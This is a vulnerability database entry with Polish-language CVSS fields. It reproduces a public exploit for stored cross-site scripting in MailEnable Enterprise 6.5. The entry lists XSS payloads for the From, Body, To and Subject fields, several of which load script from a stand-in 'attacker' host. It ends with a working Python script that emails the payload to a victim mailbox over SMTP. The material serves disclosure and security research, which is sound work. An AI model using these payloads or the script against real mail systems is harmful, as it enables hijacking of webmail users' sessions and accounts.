MailEnable Enterprise 6.5 XSS

2014.09.20
Credit: loneferret
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

#!/usr/bin/python ''' Author: loneferret of Offensive Security Product: MailEnable Enterprise Version: 6.5 Vendor Site: http://www.mailenable.com Software Download: http://www.mailenable.com/download.asp Timeline: 29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 23 Jul 2012: Update from CERT: No response from vendor 08 Aug 2012: Public Disclosure Installed On: Windows Server 2003 SP2 Client Test OS: Window 7 Pro SP1 (x86) Browser Used: Internet Explorer 9 Injection Point: From Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} Injection Point: Body Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} Injection Point: To Injection Payload(s): 1: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 2: </TITLE><SCRIPT>alert("XSS");</SCRIPT> Injection Point: Subject Injection Payload(s): 1: <SCRIPT>alert('XSS')</SCRIPT> 2: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> 3: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 4: <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> 5: <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://attacker/xss.js"></SCRIPT> 6: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT> 7: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT> 8: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT> 9: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT> 10: <SCRIPT a="blah" '' SRC="http://attacker/xss.js"></SCRIPT> 11: <SCRIPT SRC="http://attacker/xss.jpg"></SCRIPT> 12: <SCRIPT a=`>` SRC="http://attacker/xss.js"></SCRIPT> 13: <SCRIPT/XSS SRC="http://attacker/xss.js"></SCRIPT> 14: </TITLE><SCRIPT>alert("XSS");</SCRIPT> 15: <<SCRIPT>alert("XSS");//<</SCRIPT> 16: <IFRAME SRC="javascript:alert('XSS');"></IFRAME> ''' #!/usr/bin/python import smtplib, urllib2 payload = """<SCRIPT SRC=http://attacker/xss.js></SCRIPT>""" def sendMail(dstemail, frmemail, smtpsrv, username, password): msg = "From: hacker@offsec.local\n" msg += "To: victim@victim.local\n" msg += 'Date: Today\r\n' msg += "Subject: XSS" + payload + "\n" msg += "Content-type: text/html\n\n" msg += "XSS.\r\n\r\n" server = smtplib.SMTP(smtpsrv) server.login(username,password) try: server.sendmail(frmemail, dstemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e) server.quit() username = "hacker@offsec.local" password = "123456" dstemail = "victim@victim.local" frmemail = "hacker@offsec.local" smtpsrv = "172.16.84.171" print "[*] Sending Email" sendMail(dstemail, frmemail, smtpsrv, username, password)

Referencje:

http://secunia.com/advisories/50205
http://osvdb.org/84589
http://www.securityfocus.com/bid/54900
http://xforce.iss.net/xforce/xfdb/77547
http://www.exploit-db.com/exploits/20351


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top